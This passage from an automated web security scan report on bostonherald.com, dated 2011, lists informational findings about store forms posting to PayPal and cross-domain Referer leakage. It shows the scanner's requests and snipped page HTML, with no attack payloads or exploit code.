Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/images/siteImages/universal/championsBuyNow.gif">
Champions: A Herald Media 64-page full color publication
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.16. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="http://bh.heraldinteractive.com/store/images/superSweet.jpg">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.17. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
</p>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="hidden" name="cmd" value="_cart">
...[SNIP]...

6.18. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://multimedia.heraldinteractive.com/images/galleries/front_11052008.jpg" width="104" height="112">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

6.19. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<br>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

6.20. http://www.bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:54 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan222009.gif" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

7. Cross-domain Referer leakage  previous  next
There are 47 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


7.1. http://www.bostonherald.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?showResults=1#results HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 156116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fhomepage.bg%3FshowResults%3D1&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128mankins_believes_pats_days_are_over/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Logan Mankins believes Patriots days are over"></a>
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2">
...[SNIP]...
<a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/da605ca3f0_HastyTEASE.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a
                        href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3">
...[SNIP]...
<a href="/sports/basketball/other_nba/view/20110128dwyane_wade_out_for_heat-pistons_game_with_sore_wrist/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/87d77e_DWade_01292011.jpg" alt="SITTING: Heat guard and Eastern Conference All Star starter Dwyane Wade will miss tonight&rsquo;s game against the Pistons with a sprained right wrist."></a>
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
